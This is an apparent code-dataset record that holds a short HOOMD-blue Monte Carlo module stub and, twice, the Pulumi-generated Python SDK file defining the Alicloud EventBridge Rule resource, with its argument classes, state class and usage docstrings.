(`hoomd.hpmc.compute`) to compute properties of the system state, such as the
free volume or pressure.
See Also:
`Anderson 2016 <https://dx.doi.org/10.1016/j.cpc.2016.02.024>`_ further
describes the theory and implementation.
"""
# need to import all submodules defined in this directory
from hoomd.hpmc import integrate
from hoomd.hpmc import update
from hoomd.hpmc import compute
from hoomd.hpmc import tune
from hoomd.hpmc import pair
from hoomd.hpmc import external
from hoomd.hpmc import nec
from hoomd.hpmc import shape_move
| en | 0.792015 | # Copyright (c) 2009-2022 The Regents of the University of Michigan. # Part of HOOMD-blue, released under the BSD 3-Clause License. Hard particle Monte Carlo. In hard particle Monte Carlo (HPMC) simulations, the particles in the system state have extended shapes. The potential energy of the system is infinite when any particle shapes overlap. Pair (:doc:`module-hpmc-pair`) and external (:doc:`module-hpmc-external`) potentials compute the potential energy when there are no shape overlaps. `hpmc` employs the Metropolis Monte Carlo algorithm to sample equilibrium configurations of the system. To perform HPMC simulations, assign a HPMC integrator (`hoomd.hpmc.integrate`) to the `hoomd.Simulation` operations. The HPMC integrator defines the particle shapes and performs local trial moves on the particle positions and orientations. HPMC updaters (`hoomd.hpmc.update`) interoperate with the integrator to perform additional types of trial moves, including box moves, cluster moves, and particle insertion/removal. Use HPMC computes (`hoomd.hpmc.compute`) to compute properties of the system state, such as the free volume or pressure. See Also: `Anderson 2016 <https://dx.doi.org/10.1016/j.cpc.2016.02.024>`_ further describes the theory and implementation. # need to import all submodules defined in this directory | 2.204019 | 2 |
sdk/python/pulumi_alicloud/eventbridge/rule.py | pulumi/pulumi-alicloud | 42 | 6617435 | <filename>sdk/python/pulumi_alicloud/eventbridge/rule.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RuleArgs', 'Rule']
@pulumi.input_type
class RuleArgs:
def __init__(__self__, *,
event_bus_name: pulumi.Input[str],
filter_pattern: pulumi.Input[str],
rule_name: pulumi.Input[str],
targets: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]],
description: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Rule resource.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
pulumi.set(__self__, "event_bus_name", event_bus_name)
pulumi.set(__self__, "filter_pattern", filter_pattern)
pulumi.set(__self__, "rule_name", rule_name)
pulumi.set(__self__, "targets", targets)
if description is not None:
pulumi.set(__self__, "description", description)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> pulumi.Input[str]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@event_bus_name.setter
def event_bus_name(self, value: pulumi.Input[str]):
pulumi.set(self, "event_bus_name", value)
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> pulumi.Input[str]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@filter_pattern.setter
def filter_pattern(self, value: pulumi.Input[str]):
pulumi.set(self, "filter_pattern", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Input[str]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: pulumi.Input[str]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def targets(self) -> pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
@targets.setter
def targets(self, value: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]):
pulumi.set(self, "targets", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class _RuleState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]] = None):
"""
Input properties used for looking up and filtering Rule resources.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if event_bus_name is not None:
pulumi.set(__self__, "event_bus_name", event_bus_name)
if filter_pattern is not None:
pulumi.set(__self__, "filter_pattern", filter_pattern)
if rule_name is not None:
pulumi.set(__self__, "rule_name", rule_name)
if status is not None:
pulumi.set(__self__, "status", status)
if targets is not None:
pulumi.set(__self__, "targets", targets)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@event_bus_name.setter
def event_bus_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "event_bus_name", value)
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> Optional[pulumi.Input[str]]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@filter_pattern.setter
def filter_pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_pattern", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def targets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
@targets.setter
def targets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]):
pulumi.set(self, "targets", value)
class Rule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
__props__=None):
"""
Provides a Event Bridge Rule resource.
For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
> **NOTE:** Available in v1.129.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
example_rule = alicloud.eventbridge.Rule("exampleRule",
event_bus_name=example_event_bus.id,
rule_name=var["name"],
description="test",
filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
targets=[alicloud.eventbridge.RuleTargetArgs(
target_id="tf-test",
endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
type="acs.mns.queue",
param_lists=[
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="queue",
form="CONSTANT",
value="tf-testaccEbRule",
),
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="Body",
form="ORIGINAL",
),
],
)])
```
## Import
Event Bridge Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Event Bridge Rule resource.
For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
> **NOTE:** Available in v1.129.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
example_rule = alicloud.eventbridge.Rule("exampleRule",
event_bus_name=example_event_bus.id,
rule_name=var["name"],
description="test",
filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
targets=[alicloud.eventbridge.RuleTargetArgs(
target_id="tf-test",
endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
type="acs.mns.queue",
param_lists=[
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="queue",
form="CONSTANT",
value="tf-testaccEbRule",
),
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="Body",
form="ORIGINAL",
),
],
)])
```
## Import
Event Bridge Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
```
:param str resource_name: The name of the resource.
:param RuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RuleArgs.__new__(RuleArgs)
__props__.__dict__["description"] = description
if event_bus_name is None and not opts.urn:
raise TypeError("Missing required property 'event_bus_name'")
__props__.__dict__["event_bus_name"] = event_bus_name
if filter_pattern is None and not opts.urn:
raise TypeError("Missing required property 'filter_pattern'")
__props__.__dict__["filter_pattern"] = filter_pattern
if rule_name is None and not opts.urn:
raise TypeError("Missing required property 'rule_name'")
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["status"] = status
if targets is None and not opts.urn:
raise TypeError("Missing required property 'targets'")
__props__.__dict__["targets"] = targets
super(Rule, __self__).__init__(
'alicloud:eventbridge/rule:Rule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None) -> 'Rule':
"""
Get an existing Rule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RuleState.__new__(_RuleState)
__props__.__dict__["description"] = description
__props__.__dict__["event_bus_name"] = event_bus_name
__props__.__dict__["filter_pattern"] = filter_pattern
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["status"] = status
__props__.__dict__["targets"] = targets
return Rule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> pulumi.Output[str]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> pulumi.Output[str]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Output[str]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def targets(self) -> pulumi.Output[Sequence['outputs.RuleTarget']]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
| <filename>sdk/python/pulumi_alicloud/eventbridge/rule.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RuleArgs', 'Rule']
@pulumi.input_type
class RuleArgs:
    # Generated input-argument bag for the Rule resource (tfgen output).
    def __init__(__self__, *,
                 event_bus_name: pulumi.Input[str],
                 filter_pattern: pulumi.Input[str],
                 rule_name: pulumi.Input[str],
                 targets: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]],
                 description: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Rule resource.
        :param pulumi.Input[str] event_bus_name: The name of event bus.
        :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
        :param pulumi.Input[str] rule_name: The name of rule.
        :param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
        :param pulumi.Input[str] description: The description of rule.
        :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
        """
        # Required arguments are always stored; optional ones only when
        # provided, so unset values stay absent from the input map.
        pulumi.set(__self__, "event_bus_name", event_bus_name)
        pulumi.set(__self__, "filter_pattern", filter_pattern)
        pulumi.set(__self__, "rule_name", rule_name)
        pulumi.set(__self__, "targets", targets)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if status is not None:
            pulumi.set(__self__, "status", status)

    @property
    @pulumi.getter(name="eventBusName")
    def event_bus_name(self) -> pulumi.Input[str]:
        """
        The name of event bus.
        """
        return pulumi.get(self, "event_bus_name")

    @event_bus_name.setter
    def event_bus_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "event_bus_name", value)

    @property
    @pulumi.getter(name="filterPattern")
    def filter_pattern(self) -> pulumi.Input[str]:
        """
        The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
        """
        return pulumi.get(self, "filter_pattern")

    @filter_pattern.setter
    def filter_pattern(self, value: pulumi.Input[str]):
        pulumi.set(self, "filter_pattern", value)

    @property
    @pulumi.getter(name="ruleName")
    def rule_name(self) -> pulumi.Input[str]:
        """
        The name of rule.
        """
        return pulumi.get(self, "rule_name")

    @rule_name.setter
    def rule_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "rule_name", value)

    @property
    @pulumi.getter
    def targets(self) -> pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]:
        """
        The target of rule.
        """
        return pulumi.get(self, "targets")

    @targets.setter
    def targets(self, value: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]):
        pulumi.set(self, "targets", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of rule.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
@pulumi.input_type
class _RuleState:
    # Generated state bag used by Rule.get(); every field optional because
    # state lookups may carry only a subset of known values.
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 event_bus_name: Optional[pulumi.Input[str]] = None,
                 filter_pattern: Optional[pulumi.Input[str]] = None,
                 rule_name: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 targets: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]] = None):
        """
        Input properties used for looking up and filtering Rule resources.
        :param pulumi.Input[str] description: The description of rule.
        :param pulumi.Input[str] event_bus_name: The name of event bus.
        :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
        :param pulumi.Input[str] rule_name: The name of rule.
        :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
        :param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
        """
        # Only known (non-None) values are recorded.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if event_bus_name is not None:
            pulumi.set(__self__, "event_bus_name", event_bus_name)
        if filter_pattern is not None:
            pulumi.set(__self__, "filter_pattern", filter_pattern)
        if rule_name is not None:
            pulumi.set(__self__, "rule_name", rule_name)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if targets is not None:
            pulumi.set(__self__, "targets", targets)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of rule.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="eventBusName")
    def event_bus_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of event bus.
        """
        return pulumi.get(self, "event_bus_name")

    @event_bus_name.setter
    def event_bus_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "event_bus_name", value)

    @property
    @pulumi.getter(name="filterPattern")
    def filter_pattern(self) -> Optional[pulumi.Input[str]]:
        """
        The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
        """
        return pulumi.get(self, "filter_pattern")

    @filter_pattern.setter
    def filter_pattern(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "filter_pattern", value)

    @property
    @pulumi.getter(name="ruleName")
    def rule_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of rule.
        """
        return pulumi.get(self, "rule_name")

    @rule_name.setter
    def rule_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rule_name", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def targets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]:
        """
        The target of rule.
        """
        return pulumi.get(self, "targets")

    @targets.setter
    def targets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]):
        pulumi.set(self, "targets", value)
class Rule(pulumi.CustomResource):
    """Generated Pulumi resource for `alicloud:eventbridge/rule:Rule`."""

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 event_bus_name: Optional[pulumi.Input[str]] = None,
                 filter_pattern: Optional[pulumi.Input[str]] = None,
                 rule_name: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
                 __props__=None):
        """
        Provides a Event Bridge Rule resource.
        For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
        > **NOTE:** Available in v1.129.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
        example_rule = alicloud.eventbridge.Rule("exampleRule",
            event_bus_name=example_event_bus.id,
            rule_name=var["name"],
            description="test",
            filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
            targets=[alicloud.eventbridge.RuleTargetArgs(
                target_id="tf-test",
                endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
                type="acs.mns.queue",
                param_lists=[
                    alicloud.eventbridge.RuleTargetParamListArgs(
                        resource_key="queue",
                        form="CONSTANT",
                        value="tf-testaccEbRule",
                    ),
                    alicloud.eventbridge.RuleTargetParamListArgs(
                        resource_key="Body",
                        form="ORIGINAL",
                    ),
                ],
            )])
        ```
        ## Import
        Event Bridge Rule can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of rule.
        :param pulumi.Input[str] event_bus_name: The name of event bus.
        :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
        :param pulumi.Input[str] rule_name: The name of rule.
        :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: RuleArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Event Bridge Rule resource.
        For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
        > **NOTE:** Available in v1.129.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
        example_rule = alicloud.eventbridge.Rule("exampleRule",
            event_bus_name=example_event_bus.id,
            rule_name=var["name"],
            description="test",
            filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
            targets=[alicloud.eventbridge.RuleTargetArgs(
                target_id="tf-test",
                endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
                type="acs.mns.queue",
                param_lists=[
                    alicloud.eventbridge.RuleTargetParamListArgs(
                        resource_key="queue",
                        form="CONSTANT",
                        value="tf-testaccEbRule",
                    ),
                    alicloud.eventbridge.RuleTargetParamListArgs(
                        resource_key="Body",
                        form="ORIGINAL",
                    ),
                ],
            )])
        ```
        ## Import
        Event Bridge Rule can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
        ```
        :param str resource_name: The name of the resource.
        :param RuleArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: when the caller passed a
        # RuleArgs bag, unpack it into keyword arguments for _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(RuleArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       event_bus_name: Optional[pulumi.Input[str]] = None,
                       filter_pattern: Optional[pulumi.Input[str]] = None,
                       rule_name: Optional[pulumi.Input[str]] = None,
                       status: Optional[pulumi.Input[str]] = None,
                       targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
                       __props__=None):
        # Shared constructor body: validates options, then either builds a new
        # property bag or (when opts.id is set) adopts an existing resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = RuleArgs.__new__(RuleArgs)
            __props__.__dict__["description"] = description
            # Required properties are only enforced when creating a brand-new
            # resource (opts.urn unset).
            if event_bus_name is None and not opts.urn:
                raise TypeError("Missing required property 'event_bus_name'")
            __props__.__dict__["event_bus_name"] = event_bus_name
            if filter_pattern is None and not opts.urn:
                raise TypeError("Missing required property 'filter_pattern'")
            __props__.__dict__["filter_pattern"] = filter_pattern
            if rule_name is None and not opts.urn:
                raise TypeError("Missing required property 'rule_name'")
            __props__.__dict__["rule_name"] = rule_name
            __props__.__dict__["status"] = status
            if targets is None and not opts.urn:
                raise TypeError("Missing required property 'targets'")
            __props__.__dict__["targets"] = targets
        super(Rule, __self__).__init__(
            'alicloud:eventbridge/rule:Rule',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            description: Optional[pulumi.Input[str]] = None,
            event_bus_name: Optional[pulumi.Input[str]] = None,
            filter_pattern: Optional[pulumi.Input[str]] = None,
            rule_name: Optional[pulumi.Input[str]] = None,
            status: Optional[pulumi.Input[str]] = None,
            targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None) -> 'Rule':
        """
        Get an existing Rule resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of rule.
        :param pulumi.Input[str] event_bus_name: The name of event bus.
        :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
        :param pulumi.Input[str] rule_name: The name of rule.
